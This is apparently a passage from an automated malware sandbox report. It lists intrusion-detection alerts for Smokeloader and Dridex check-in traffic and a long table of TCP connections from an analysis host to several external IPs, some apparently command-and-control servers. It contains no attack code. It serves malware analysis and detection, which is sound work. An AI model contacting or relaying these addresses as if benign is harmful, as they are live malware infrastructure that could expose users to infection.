                                        2024-10-07T15:02:16.720307+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.550023188.40.141.211443TCP
                                        2024-10-07T15:02:17.024280+02002809882ETPRO MALWARE Dridex Post Checkin Activity 31192.168.2.550023188.40.141.211443TCP
                                        2024-10-07T15:02:17.696520+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.550024188.40.141.211443TCP
                                        2024-10-07T15:02:18.001733+02002809882ETPRO MALWARE Dridex Post Checkin Activity 31192.168.2.550024188.40.141.211443TCP
                                        2024-10-07T15:02:29.863734+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.550025189.195.132.13480TCP
                                        2024-10-07T15:02:39.765694+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.550026188.40.141.211443TCP
                                        2024-10-07T15:02:40.046670+02002809882ETPRO MALWARE Dridex Post Checkin Activity 31192.168.2.550026188.40.141.211443TCP
                                        2024-10-07T15:02:40.760206+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.550027188.40.141.211443TCP
                                        2024-10-07T15:02:41.069076+02002809882ETPRO MALWARE Dridex Post Checkin Activity 31192.168.2.550027188.40.141.211443TCP
                                        2024-10-07T15:02:50.926729+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.550028189.195.132.13480TCP
                                        2024-10-07T15:03:02.556191+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.550029188.40.141.211443TCP
                                        2024-10-07T15:03:02.864372+02002809882ETPRO MALWARE Dridex Post Checkin Activity 31192.168.2.550029188.40.141.211443TCP
                                        2024-10-07T15:03:03.522877+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.550030188.40.141.211443TCP
                                        2024-10-07T15:03:03.824257+02002809882ETPRO MALWARE Dridex Post Checkin Activity 31192.168.2.550030188.40.141.211443TCP

                                        Network Port Distribution

                                        TCP Packets

                                        TimestampSource PortDest PortSource IPDest IP
                                        Oct 7, 2024 14:59:23.352284908 CEST4977080192.168.2.5105.197.97.247
                                        Oct 7, 2024 14:59:23.357119083 CEST8049770105.197.97.247192.168.2.5
                                        Oct 7, 2024 14:59:23.357194901 CEST4977080192.168.2.5105.197.97.247
                                        Oct 7, 2024 14:59:23.357438087 CEST4977080192.168.2.5105.197.97.247
                                        Oct 7, 2024 14:59:23.357517004 CEST4977080192.168.2.5105.197.97.247
                                        Oct 7, 2024 14:59:23.362198114 CEST8049770105.197.97.247192.168.2.5
                                        Oct 7, 2024 14:59:23.362221956 CEST8049770105.197.97.247192.168.2.5
                                        Oct 7, 2024 14:59:24.450309992 CEST8049770105.197.97.247192.168.2.5
                                        Oct 7, 2024 14:59:24.450328112 CEST8049770105.197.97.247192.168.2.5
                                        Oct 7, 2024 14:59:24.450344086 CEST8049770105.197.97.247192.168.2.5
                                        Oct 7, 2024 14:59:24.450424910 CEST4977080192.168.2.5105.197.97.247
                                        Oct 7, 2024 14:59:24.451848984 CEST4977080192.168.2.5105.197.97.247
                                        Oct 7, 2024 14:59:24.456645012 CEST8049770105.197.97.247192.168.2.5
                                        Oct 7, 2024 14:59:24.456887960 CEST4977680192.168.2.5105.197.97.247
                                        Oct 7, 2024 14:59:24.461776972 CEST8049776105.197.97.247192.168.2.5
                                        Oct 7, 2024 14:59:24.461854935 CEST4977680192.168.2.5105.197.97.247
                                        Oct 7, 2024 14:59:24.462007999 CEST4977680192.168.2.5105.197.97.247
                                        Oct 7, 2024 14:59:24.462030888 CEST4977680192.168.2.5105.197.97.247
                                        Oct 7, 2024 14:59:24.466722965 CEST8049776105.197.97.247192.168.2.5
                                        Oct 7, 2024 14:59:24.466734886 CEST8049776105.197.97.247192.168.2.5
                                        Oct 7, 2024 14:59:25.373585939 CEST8049776105.197.97.247192.168.2.5
                                        Oct 7, 2024 14:59:25.374358892 CEST8049776105.197.97.247192.168.2.5
                                        Oct 7, 2024 14:59:25.374465942 CEST4977680192.168.2.5105.197.97.247
                                        Oct 7, 2024 14:59:25.374640942 CEST4977680192.168.2.5105.197.97.247
                                        Oct 7, 2024 14:59:25.378520966 CEST4978280192.168.2.5105.197.97.247
                                        Oct 7, 2024 14:59:25.379443884 CEST8049776105.197.97.247192.168.2.5
                                        Oct 7, 2024 14:59:25.383449078 CEST8049782105.197.97.247192.168.2.5
                                        Oct 7, 2024 14:59:25.383539915 CEST4978280192.168.2.5105.197.97.247
                                        Oct 7, 2024 14:59:25.383702993 CEST4978280192.168.2.5105.197.97.247
                                        Oct 7, 2024 14:59:25.383718967 CEST4978280192.168.2.5105.197.97.247
                                        Oct 7, 2024 14:59:25.388475895 CEST8049782105.197.97.247192.168.2.5
                                        Oct 7, 2024 14:59:25.388717890 CEST8049782105.197.97.247192.168.2.5
                                        Oct 7, 2024 14:59:26.313987970 CEST8049782105.197.97.247192.168.2.5
                                        Oct 7, 2024 14:59:26.314189911 CEST8049782105.197.97.247192.168.2.5
                                        Oct 7, 2024 14:59:26.314239979 CEST4978280192.168.2.5105.197.97.247
                                        Oct 7, 2024 14:59:26.315104961 CEST4978280192.168.2.5105.197.97.247
                                        Oct 7, 2024 14:59:26.317727089 CEST4978880192.168.2.5105.197.97.247
                                        Oct 7, 2024 14:59:26.319900990 CEST8049782105.197.97.247192.168.2.5
                                        Oct 7, 2024 14:59:26.322756052 CEST8049788105.197.97.247192.168.2.5
                                        Oct 7, 2024 14:59:26.322832108 CEST4978880192.168.2.5105.197.97.247
                                        Oct 7, 2024 14:59:26.323055029 CEST4978880192.168.2.5105.197.97.247
                                        Oct 7, 2024 14:59:26.323072910 CEST4978880192.168.2.5105.197.97.247
                                        Oct 7, 2024 14:59:26.327909946 CEST8049788105.197.97.247192.168.2.5
                                        Oct 7, 2024 14:59:26.328115940 CEST8049788105.197.97.247192.168.2.5
                                        Oct 7, 2024 14:59:27.264467001 CEST8049788105.197.97.247192.168.2.5
                                        Oct 7, 2024 14:59:27.264606953 CEST8049788105.197.97.247192.168.2.5
                                        Oct 7, 2024 14:59:27.265045881 CEST4978880192.168.2.5105.197.97.247
                                        Oct 7, 2024 14:59:27.265173912 CEST4978880192.168.2.5105.197.97.247
                                        Oct 7, 2024 14:59:27.268871069 CEST4979480192.168.2.5105.197.97.247
                                        Oct 7, 2024 14:59:27.270044088 CEST8049788105.197.97.247192.168.2.5
                                        Oct 7, 2024 14:59:27.273729086 CEST8049794105.197.97.247192.168.2.5
                                        Oct 7, 2024 14:59:27.273813963 CEST4979480192.168.2.5105.197.97.247
                                        Oct 7, 2024 14:59:27.273969889 CEST4979480192.168.2.5105.197.97.247
                                        Oct 7, 2024 14:59:27.273998022 CEST4979480192.168.2.5105.197.97.247
                                        Oct 7, 2024 14:59:27.278748989 CEST8049794105.197.97.247192.168.2.5
                                        Oct 7, 2024 14:59:27.278861046 CEST8049794105.197.97.247192.168.2.5
                                        Oct 7, 2024 14:59:28.191555023 CEST8049794105.197.97.247192.168.2.5
                                        Oct 7, 2024 14:59:28.193468094 CEST8049794105.197.97.247192.168.2.5
                                        Oct 7, 2024 14:59:28.193589926 CEST4979480192.168.2.5105.197.97.247
                                        Oct 7, 2024 14:59:28.193612099 CEST4979480192.168.2.5105.197.97.247
                                        Oct 7, 2024 14:59:28.197365046 CEST4980480192.168.2.5105.197.97.247
                                        Oct 7, 2024 14:59:28.198719025 CEST8049794105.197.97.247192.168.2.5
                                        Oct 7, 2024 14:59:28.202373981 CEST8049804105.197.97.247192.168.2.5
                                        Oct 7, 2024 14:59:28.202486038 CEST4980480192.168.2.5105.197.97.247
                                        Oct 7, 2024 14:59:28.202608109 CEST4980480192.168.2.5105.197.97.247
                                        Oct 7, 2024 14:59:28.202627897 CEST4980480192.168.2.5105.197.97.247
                                        Oct 7, 2024 14:59:28.207739115 CEST8049804105.197.97.247192.168.2.5
                                        Oct 7, 2024 14:59:28.207756042 CEST8049804105.197.97.247192.168.2.5
                                        Oct 7, 2024 14:59:29.129834890 CEST8049804105.197.97.247192.168.2.5
                                        Oct 7, 2024 14:59:29.129967928 CEST8049804105.197.97.247192.168.2.5
                                        Oct 7, 2024 14:59:29.130089998 CEST4980480192.168.2.5105.197.97.247
                                        Oct 7, 2024 14:59:29.130151033 CEST4980480192.168.2.5105.197.97.247
                                        Oct 7, 2024 14:59:29.133368969 CEST4981080192.168.2.5105.197.97.247
                                        Oct 7, 2024 14:59:29.136049032 CEST8049804105.197.97.247192.168.2.5
                                        Oct 7, 2024 14:59:29.138767004 CEST8049810105.197.97.247192.168.2.5
                                        Oct 7, 2024 14:59:29.138838053 CEST4981080192.168.2.5105.197.97.247
                                        Oct 7, 2024 14:59:29.138952017 CEST4981080192.168.2.5105.197.97.247
                                        Oct 7, 2024 14:59:29.138984919 CEST4981080192.168.2.5105.197.97.247
                                        Oct 7, 2024 14:59:29.143904924 CEST8049810105.197.97.247192.168.2.5
                                        Oct 7, 2024 14:59:29.144401073 CEST8049810105.197.97.247192.168.2.5
                                        Oct 7, 2024 14:59:30.253298998 CEST8049810105.197.97.247192.168.2.5
                                        Oct 7, 2024 14:59:30.253309011 CEST8049810105.197.97.247192.168.2.5
                                        Oct 7, 2024 14:59:30.253314018 CEST8049810105.197.97.247192.168.2.5
                                        Oct 7, 2024 14:59:30.253391027 CEST4981080192.168.2.5105.197.97.247
                                        Oct 7, 2024 14:59:30.253580093 CEST4981080192.168.2.5105.197.97.247
                                        Oct 7, 2024 14:59:30.258548975 CEST4981480192.168.2.5105.197.97.247
                                        Oct 7, 2024 14:59:30.258841991 CEST8049810105.197.97.247192.168.2.5
                                        Oct 7, 2024 14:59:30.263360023 CEST8049814105.197.97.247192.168.2.5
                                        Oct 7, 2024 14:59:30.263422966 CEST4981480192.168.2.5105.197.97.247
                                        Oct 7, 2024 14:59:30.263648987 CEST4981480192.168.2.5105.197.97.247
                                        Oct 7, 2024 14:59:30.263648987 CEST4981480192.168.2.5105.197.97.247
                                        Oct 7, 2024 14:59:30.268642902 CEST8049814105.197.97.247192.168.2.5
                                        Oct 7, 2024 14:59:30.268867016 CEST8049814105.197.97.247192.168.2.5
                                        Oct 7, 2024 14:59:31.175985098 CEST8049814105.197.97.247192.168.2.5
                                        Oct 7, 2024 14:59:31.176558018 CEST8049814105.197.97.247192.168.2.5
                                        Oct 7, 2024 14:59:31.176635027 CEST4981480192.168.2.5105.197.97.247
                                        Oct 7, 2024 14:59:31.177113056 CEST4981480192.168.2.5105.197.97.247
                                        Oct 7, 2024 14:59:31.180226088 CEST4982280192.168.2.5105.197.97.247
                                        Oct 7, 2024 14:59:31.182082891 CEST8049814105.197.97.247192.168.2.5
                                        Oct 7, 2024 14:59:31.185290098 CEST8049822105.197.97.247192.168.2.5
                                        Oct 7, 2024 14:59:31.185393095 CEST4982280192.168.2.5105.197.97.247
                                        Oct 7, 2024 14:59:31.185761929 CEST4982280192.168.2.5105.197.97.247
                                        Oct 7, 2024 14:59:31.185786009 CEST4982280192.168.2.5105.197.97.247
                                        Oct 7, 2024 14:59:31.190629005 CEST8049822105.197.97.247192.168.2.5
                                        Oct 7, 2024 14:59:31.190845966 CEST8049822105.197.97.247192.168.2.5
                                        Oct 7, 2024 14:59:32.218347073 CEST8049822105.197.97.247192.168.2.5
                                        Oct 7, 2024 14:59:32.219069958 CEST8049822105.197.97.247192.168.2.5
                                        Oct 7, 2024 14:59:32.219132900 CEST4982280192.168.2.5105.197.97.247
                                        Oct 7, 2024 14:59:32.219192028 CEST4982280192.168.2.5105.197.97.247
                                        Oct 7, 2024 14:59:32.222599983 CEST4983180192.168.2.5105.197.97.247
                                        Oct 7, 2024 14:59:32.224394083 CEST8049822105.197.97.247192.168.2.5
                                        Oct 7, 2024 14:59:32.228171110 CEST8049831105.197.97.247192.168.2.5
                                        Oct 7, 2024 14:59:32.228456974 CEST4983180192.168.2.5105.197.97.247
                                        Oct 7, 2024 14:59:32.228586912 CEST4983180192.168.2.5105.197.97.247
                                        Oct 7, 2024 14:59:32.228606939 CEST4983180192.168.2.5105.197.97.247
                                        Oct 7, 2024 14:59:32.233433008 CEST8049831105.197.97.247192.168.2.5
                                        Oct 7, 2024 14:59:32.233550072 CEST8049831105.197.97.247192.168.2.5
                                        Oct 7, 2024 14:59:33.173722982 CEST8049831105.197.97.247192.168.2.5
                                        Oct 7, 2024 14:59:33.173912048 CEST8049831105.197.97.247192.168.2.5
                                        Oct 7, 2024 14:59:33.173976898 CEST4983180192.168.2.5105.197.97.247
                                        Oct 7, 2024 14:59:33.174029112 CEST4983180192.168.2.5105.197.97.247
                                        Oct 7, 2024 14:59:33.176975012 CEST4983780192.168.2.5105.197.97.247
                                        Oct 7, 2024 14:59:33.178930044 CEST8049831105.197.97.247192.168.2.5
                                        Oct 7, 2024 14:59:33.181982040 CEST8049837105.197.97.247192.168.2.5
                                        Oct 7, 2024 14:59:33.182079077 CEST4983780192.168.2.5105.197.97.247
                                        Oct 7, 2024 14:59:33.182248116 CEST4983780192.168.2.5105.197.97.247
                                        Oct 7, 2024 14:59:33.182384968 CEST4983780192.168.2.5105.197.97.247
                                        Oct 7, 2024 14:59:33.187038898 CEST8049837105.197.97.247192.168.2.5
                                        Oct 7, 2024 14:59:33.187213898 CEST8049837105.197.97.247192.168.2.5
                                        Oct 7, 2024 14:59:34.105287075 CEST8049837105.197.97.247192.168.2.5
                                        Oct 7, 2024 14:59:34.105741024 CEST8049837105.197.97.247192.168.2.5
                                        Oct 7, 2024 14:59:34.105789900 CEST4983780192.168.2.5105.197.97.247
                                        Oct 7, 2024 14:59:34.106506109 CEST4983780192.168.2.5105.197.97.247
                                        Oct 7, 2024 14:59:34.110728979 CEST4984480192.168.2.5105.197.97.247
                                        Oct 7, 2024 14:59:34.111345053 CEST8049837105.197.97.247192.168.2.5
                                        Oct 7, 2024 14:59:34.116442919 CEST8049844105.197.97.247192.168.2.5
                                        Oct 7, 2024 14:59:34.116563082 CEST4984480192.168.2.5105.197.97.247
                                        Oct 7, 2024 14:59:34.116712093 CEST4984480192.168.2.5105.197.97.247
                                        Oct 7, 2024 14:59:34.116729021 CEST4984480192.168.2.5105.197.97.247
                                        Oct 7, 2024 14:59:34.121618032 CEST8049844105.197.97.247192.168.2.5
                                        Oct 7, 2024 14:59:34.122020006 CEST8049844105.197.97.247192.168.2.5
                                        Oct 7, 2024 14:59:35.044061899 CEST8049844105.197.97.247192.168.2.5
                                        Oct 7, 2024 14:59:35.044076920 CEST8049844105.197.97.247192.168.2.5
                                        Oct 7, 2024 14:59:35.044145107 CEST4984480192.168.2.5105.197.97.247
                                        Oct 7, 2024 14:59:35.044379950 CEST4984480192.168.2.5105.197.97.247
                                        Oct 7, 2024 14:59:35.047786951 CEST4985080192.168.2.5105.197.97.247
                                        Oct 7, 2024 14:59:35.052967072 CEST8049844105.197.97.247192.168.2.5
                                        Oct 7, 2024 14:59:35.054743052 CEST8049850105.197.97.247192.168.2.5
                                        Oct 7, 2024 14:59:35.054815054 CEST4985080192.168.2.5105.197.97.247
                                        Oct 7, 2024 14:59:35.054987907 CEST4985080192.168.2.5105.197.97.247
                                        Oct 7, 2024 14:59:35.055008888 CEST4985080192.168.2.5105.197.97.247
                                        Oct 7, 2024 14:59:35.059777021 CEST8049850105.197.97.247192.168.2.5
                                        Oct 7, 2024 14:59:35.060149908 CEST8049850105.197.97.247192.168.2.5
                                        Oct 7, 2024 14:59:35.979567051 CEST8049850105.197.97.247192.168.2.5
                                        Oct 7, 2024 14:59:35.980109930 CEST8049850105.197.97.247192.168.2.5
                                        Oct 7, 2024 14:59:35.980166912 CEST4985080192.168.2.5105.197.97.247
                                        Oct 7, 2024 14:59:35.982372999 CEST4985080192.168.2.5105.197.97.247
                                        Oct 7, 2024 14:59:35.987262964 CEST8049850105.197.97.247192.168.2.5
                                        Oct 7, 2024 14:59:36.401704073 CEST4985680192.168.2.5105.197.97.247
                                        Oct 7, 2024 14:59:36.406632900 CEST8049856105.197.97.247192.168.2.5
                                        Oct 7, 2024 14:59:36.406860113 CEST4985680192.168.2.5105.197.97.247
                                        Oct 7, 2024 14:59:36.406860113 CEST4985680192.168.2.5105.197.97.247
                                        Oct 7, 2024 14:59:36.406965017 CEST4985680192.168.2.5105.197.97.247
                                        Oct 7, 2024 14:59:36.411844969 CEST8049856105.197.97.247192.168.2.5
                                        Oct 7, 2024 14:59:36.412195921 CEST8049856105.197.97.247192.168.2.5
                                        Oct 7, 2024 14:59:37.312268972 CEST8049856105.197.97.247192.168.2.5
                                        Oct 7, 2024 14:59:37.313024998 CEST8049856105.197.97.247192.168.2.5
                                        Oct 7, 2024 14:59:37.313136101 CEST4985680192.168.2.5105.197.97.247
                                        Oct 7, 2024 14:59:37.313183069 CEST4985680192.168.2.5105.197.97.247
                                        Oct 7, 2024 14:59:37.316435099 CEST4986780192.168.2.5105.197.97.247
                                        Oct 7, 2024 14:59:37.317996025 CEST8049856105.197.97.247192.168.2.5
                                        Oct 7, 2024 14:59:37.321436882 CEST8049867105.197.97.247192.168.2.5
                                        Oct 7, 2024 14:59:37.321505070 CEST4986780192.168.2.5105.197.97.247
                                        Oct 7, 2024 14:59:37.321669102 CEST4986780192.168.2.5105.197.97.247
                                        Oct 7, 2024 14:59:37.321669102 CEST4986780192.168.2.5105.197.97.247
                                        Oct 7, 2024 14:59:37.327128887 CEST8049867105.197.97.247192.168.2.5
                                        Oct 7, 2024 14:59:37.328677893 CEST8049867105.197.97.247192.168.2.5
                                        Oct 7, 2024 14:59:38.356266975 CEST8049867105.197.97.247192.168.2.5
                                        Oct 7, 2024 14:59:38.356276989 CEST8049867105.197.97.247192.168.2.5
                                        Oct 7, 2024 14:59:38.356288910 CEST8049867105.197.97.247192.168.2.5
                                        Oct 7, 2024 14:59:38.356353998 CEST4986780192.168.2.5105.197.97.247
                                        Oct 7, 2024 14:59:38.356380939 CEST4986780192.168.2.5105.197.97.247
                                        Oct 7, 2024 14:59:38.356515884 CEST4986780192.168.2.5105.197.97.247
                                        Oct 7, 2024 14:59:38.360152960 CEST4986880192.168.2.5105.197.97.247
                                        Oct 7, 2024 14:59:38.361428976 CEST8049867105.197.97.247192.168.2.5
                                        Oct 7, 2024 14:59:38.364954948 CEST8049868105.197.97.247192.168.2.5
                                        Oct 7, 2024 14:59:38.365072966 CEST4986880192.168.2.5105.197.97.247
                                        Oct 7, 2024 14:59:38.365433931 CEST4986880192.168.2.5105.197.97.247
                                        Oct 7, 2024 14:59:38.365433931 CEST4986880192.168.2.5105.197.97.247
                                        Oct 7, 2024 14:59:38.370198965 CEST8049868105.197.97.247192.168.2.5
                                        Oct 7, 2024 14:59:38.370218039 CEST8049868105.197.97.247192.168.2.5
                                        Oct 7, 2024 14:59:39.268884897 CEST8049868105.197.97.247192.168.2.5
                                        Oct 7, 2024 14:59:39.269633055 CEST8049868105.197.97.247192.168.2.5
                                        Oct 7, 2024 14:59:39.269701958 CEST4986880192.168.2.5105.197.97.247
                                        Oct 7, 2024 14:59:39.275887012 CEST4986880192.168.2.5105.197.97.247
                                        Oct 7, 2024 14:59:39.280821085 CEST8049868105.197.97.247192.168.2.5
                                        Oct 7, 2024 14:59:39.302546978 CEST4987480192.168.2.5105.197.97.247
                                        Oct 7, 2024 14:59:39.307663918 CEST8049874105.197.97.247192.168.2.5
                                        Oct 7, 2024 14:59:39.307744026 CEST4987480192.168.2.5105.197.97.247
                                        Oct 7, 2024 14:59:39.307909012 CEST4987480192.168.2.5105.197.97.247
                                        Oct 7, 2024 14:59:39.307909012 CEST4987480192.168.2.5105.197.97.247
                                        Oct 7, 2024 14:59:39.312817097 CEST8049874105.197.97.247192.168.2.5
                                        Oct 7, 2024 14:59:39.312836885 CEST8049874105.197.97.247192.168.2.5
                                        Oct 7, 2024 14:59:40.231791973 CEST8049874105.197.97.247192.168.2.5
                                        Oct 7, 2024 14:59:40.231837034 CEST8049874105.197.97.247192.168.2.5
                                        Oct 7, 2024 14:59:40.231913090 CEST4987480192.168.2.5105.197.97.247
                                        Oct 7, 2024 14:59:40.232117891 CEST4987480192.168.2.5105.197.97.247
                                        Oct 7, 2024 14:59:40.235404015 CEST4988580192.168.2.5105.197.97.247
                                        Oct 7, 2024 14:59:40.236985922 CEST8049874105.197.97.247192.168.2.5
                                        Oct 7, 2024 14:59:40.240279913 CEST8049885105.197.97.247192.168.2.5
                                        Oct 7, 2024 14:59:40.240370035 CEST4988580192.168.2.5105.197.97.247
                                        Oct 7, 2024 14:59:40.240510941 CEST4988580192.168.2.5105.197.97.247
                                        Oct 7, 2024 14:59:40.240534067 CEST4988580192.168.2.5105.197.97.247
                                        Oct 7, 2024 14:59:40.245302916 CEST8049885105.197.97.247192.168.2.5
                                        Oct 7, 2024 14:59:40.245789051 CEST8049885105.197.97.247192.168.2.5
                                        Oct 7, 2024 14:59:41.191051006 CEST8049885105.197.97.247192.168.2.5
                                        Oct 7, 2024 14:59:41.192085028 CEST8049885105.197.97.247192.168.2.5
                                        Oct 7, 2024 14:59:41.192148924 CEST4988580192.168.2.5105.197.97.247
                                        Oct 7, 2024 14:59:41.192276001 CEST4988580192.168.2.5105.197.97.247
                                        Oct 7, 2024 14:59:41.197151899 CEST8049885105.197.97.247192.168.2.5
                                        Oct 7, 2024 14:59:41.205389023 CEST4989180192.168.2.5105.197.97.247
                                        Oct 7, 2024 14:59:41.210236073 CEST8049891105.197.97.247192.168.2.5
                                        Oct 7, 2024 14:59:41.210310936 CEST4989180192.168.2.5105.197.97.247
                                        Oct 7, 2024 14:59:41.210547924 CEST4989180192.168.2.5105.197.97.247
                                        Oct 7, 2024 14:59:41.210547924 CEST4989180192.168.2.5105.197.97.247
                                        Oct 7, 2024 14:59:41.215491056 CEST8049891105.197.97.247192.168.2.5
                                        Oct 7, 2024 14:59:41.215502024 CEST8049891105.197.97.247192.168.2.5
                                        Oct 7, 2024 14:59:42.137079000 CEST8049891105.197.97.247192.168.2.5
                                        Oct 7, 2024 14:59:42.137543917 CEST8049891105.197.97.247192.168.2.5
                                        Oct 7, 2024 14:59:42.137608051 CEST4989180192.168.2.5105.197.97.247
                                        Oct 7, 2024 14:59:42.137662888 CEST4989180192.168.2.5105.197.97.247
                                        Oct 7, 2024 14:59:42.141005993 CEST4989780192.168.2.5105.197.97.247
                                        Oct 7, 2024 14:59:42.142462015 CEST8049891105.197.97.247192.168.2.5
                                        Oct 7, 2024 14:59:42.145883083 CEST8049897105.197.97.247192.168.2.5
                                        Oct 7, 2024 14:59:42.146378040 CEST4989780192.168.2.5105.197.97.247
                                        Oct 7, 2024 14:59:42.146612883 CEST4989780192.168.2.5105.197.97.247
                                        Oct 7, 2024 14:59:42.146632910 CEST4989780192.168.2.5105.197.97.247
                                        Oct 7, 2024 14:59:42.151587963 CEST8049897105.197.97.247192.168.2.5
                                        Oct 7, 2024 14:59:42.152621031 CEST8049897105.197.97.247192.168.2.5
                                        Oct 7, 2024 14:59:43.084280968 CEST8049897105.197.97.247192.168.2.5
                                        Oct 7, 2024 14:59:43.085601091 CEST8049897105.197.97.247192.168.2.5
                                        Oct 7, 2024 14:59:43.085741997 CEST4989780192.168.2.5105.197.97.247
                                        Oct 7, 2024 14:59:43.085741997 CEST4989780192.168.2.5105.197.97.247
                                        Oct 7, 2024 14:59:43.088990927 CEST4990380192.168.2.5105.197.97.247
                                        Oct 7, 2024 14:59:43.090658903 CEST8049897105.197.97.247192.168.2.5
                                        Oct 7, 2024 14:59:43.093935966 CEST8049903105.197.97.247192.168.2.5
                                        Oct 7, 2024 14:59:43.094247103 CEST4990380192.168.2.5105.197.97.247
                                        Oct 7, 2024 14:59:43.094247103 CEST4990380192.168.2.5105.197.97.247
                                        Oct 7, 2024 14:59:43.094276905 CEST4990380192.168.2.5105.197.97.247
                                        Oct 7, 2024 14:59:43.099175930 CEST8049903105.197.97.247192.168.2.5
                                        Oct 7, 2024 14:59:43.099256992 CEST8049903105.197.97.247192.168.2.5
                                        Oct 7, 2024 14:59:44.027868032 CEST8049903105.197.97.247192.168.2.5
                                        Oct 7, 2024 14:59:44.028537035 CEST8049903105.197.97.247192.168.2.5
                                        Oct 7, 2024 14:59:44.028779984 CEST4990380192.168.2.5105.197.97.247
                                        Oct 7, 2024 14:59:44.028779984 CEST4990380192.168.2.5105.197.97.247
                                        Oct 7, 2024 14:59:44.032675028 CEST4991080192.168.2.5105.197.97.247
                                        Oct 7, 2024 14:59:44.033884048 CEST8049903105.197.97.247192.168.2.5
                                        Oct 7, 2024 14:59:44.037662029 CEST8049910105.197.97.247192.168.2.5
                                        Oct 7, 2024 14:59:44.037738085 CEST4991080192.168.2.5105.197.97.247
                                        Oct 7, 2024 14:59:44.037916899 CEST4991080192.168.2.5105.197.97.247
                                        Oct 7, 2024 14:59:44.037940025 CEST4991080192.168.2.5105.197.97.247
                                        Oct 7, 2024 14:59:44.042890072 CEST8049910105.197.97.247192.168.2.5
                                        Oct 7, 2024 14:59:44.042901039 CEST8049910105.197.97.247192.168.2.5
                                        Oct 7, 2024 14:59:44.971501112 CEST8049910105.197.97.247192.168.2.5
                                        Oct 7, 2024 14:59:44.972651958 CEST8049910105.197.97.247192.168.2.5
                                        Oct 7, 2024 14:59:44.972760916 CEST4991080192.168.2.5105.197.97.247
                                        Oct 7, 2024 14:59:44.973345995 CEST4991080192.168.2.5105.197.97.247
                                        Oct 7, 2024 14:59:44.976273060 CEST4991680192.168.2.5105.197.97.247
                                        Oct 7, 2024 14:59:44.978383064 CEST8049910105.197.97.247192.168.2.5
                                        Oct 7, 2024 14:59:44.981369972 CEST8049916105.197.97.247192.168.2.5
                                        Oct 7, 2024 14:59:44.981478930 CEST4991680192.168.2.5105.197.97.247
                                        Oct 7, 2024 14:59:44.981661081 CEST4991680192.168.2.5105.197.97.247
                                        Oct 7, 2024 14:59:44.981683016 CEST4991680192.168.2.5105.197.97.247
                                        Oct 7, 2024 14:59:44.986996889 CEST8049916105.197.97.247192.168.2.5
                                        Oct 7, 2024 14:59:44.989341974 CEST8049916105.197.97.247192.168.2.5
                                        Oct 7, 2024 14:59:45.906971931 CEST8049916105.197.97.247192.168.2.5
                                        Oct 7, 2024 14:59:45.907615900 CEST8049916105.197.97.247192.168.2.5
                                        Oct 7, 2024 14:59:45.907705069 CEST4991680192.168.2.5105.197.97.247
                                        Oct 7, 2024 14:59:45.915400982 CEST4991680192.168.2.5105.197.97.247
                                        Oct 7, 2024 14:59:45.920272112 CEST8049916105.197.97.247192.168.2.5
                                        Oct 7, 2024 14:59:45.995304108 CEST4992280192.168.2.5105.197.97.247
                                        Oct 7, 2024 14:59:46.000938892 CEST8049922105.197.97.247192.168.2.5
                                        Oct 7, 2024 14:59:46.001060009 CEST4992280192.168.2.5105.197.97.247
                                        Oct 7, 2024 14:59:46.020895004 CEST4992280192.168.2.5105.197.97.247
                                        Oct 7, 2024 14:59:46.021135092 CEST4992280192.168.2.5105.197.97.247
                                        Oct 7, 2024 14:59:46.025818110 CEST8049922105.197.97.247192.168.2.5
                                        Oct 7, 2024 14:59:46.025979996 CEST8049922105.197.97.247192.168.2.5
                                        Oct 7, 2024 14:59:47.047126055 CEST8049922105.197.97.247192.168.2.5
                                        Oct 7, 2024 14:59:47.047144890 CEST8049922105.197.97.247192.168.2.5
                                        Oct 7, 2024 14:59:47.047276020 CEST4992280192.168.2.5105.197.97.247
                                        Oct 7, 2024 14:59:47.049721956 CEST4992280192.168.2.5105.197.97.247
                                        Oct 7, 2024 14:59:47.053872108 CEST49932443192.168.2.523.145.40.164
                                        Oct 7, 2024 14:59:47.053911924 CEST4434993223.145.40.164192.168.2.5
                                        Oct 7, 2024 14:59:47.053973913 CEST49932443192.168.2.523.145.40.164
                                        Oct 7, 2024 14:59:47.054445982 CEST49932443192.168.2.523.145.40.164
                                        Oct 7, 2024 14:59:47.054455042 CEST4434993223.145.40.164192.168.2.5
                                        Oct 7, 2024 14:59:47.054640055 CEST8049922105.197.97.247192.168.2.5
                                        Oct 7, 2024 14:59:47.709902048 CEST4434993223.145.40.164192.168.2.5
                                        Oct 7, 2024 14:59:47.710026026 CEST49932443192.168.2.523.145.40.164
                                        Oct 7, 2024 14:59:47.714416981 CEST49932443192.168.2.523.145.40.164
                                        Oct 7, 2024 14:59:47.714441061 CEST4434993223.145.40.164192.168.2.5
                                        Oct 7, 2024 14:59:47.714812040 CEST4434993223.145.40.164192.168.2.5
                                        Oct 7, 2024 14:59:47.725377083 CEST49932443192.168.2.523.145.40.164
                                        Oct 7, 2024 14:59:47.767416954 CEST4434993223.145.40.164192.168.2.5
                                        Oct 7, 2024 14:59:47.933795929 CEST4434993223.145.40.164192.168.2.5
                                        Oct 7, 2024 14:59:47.933828115 CEST4434993223.145.40.164192.168.2.5
                                        Oct 7, 2024 14:59:47.933975935 CEST49932443192.168.2.523.145.40.164
                                        Oct 7, 2024 14:59:47.934005976 CEST4434993223.145.40.164192.168.2.5
                                        Oct 7, 2024 14:59:47.986707926 CEST49932443192.168.2.523.145.40.164
                                        Oct 7, 2024 14:59:48.018661976 CEST4434993223.145.40.164192.168.2.5
                                        Oct 7, 2024 14:59:48.018672943 CEST4434993223.145.40.164192.168.2.5
                                        Oct 7, 2024 14:59:48.018739939 CEST49932443192.168.2.523.145.40.164
                                        Oct 7, 2024 14:59:48.018790007 CEST4434993223.145.40.164192.168.2.5
                                        Oct 7, 2024 14:59:48.018798113 CEST4434993223.145.40.164192.168.2.5
                                        Oct 7, 2024 14:59:48.018841028 CEST49932443192.168.2.523.145.40.164
                                        Oct 7, 2024 14:59:48.019932032 CEST4434993223.145.40.164192.168.2.5
                                        Oct 7, 2024 14:59:48.019941092 CEST4434993223.145.40.164192.168.2.5
                                        Oct 7, 2024 14:59:48.020003080 CEST49932443192.168.2.523.145.40.164
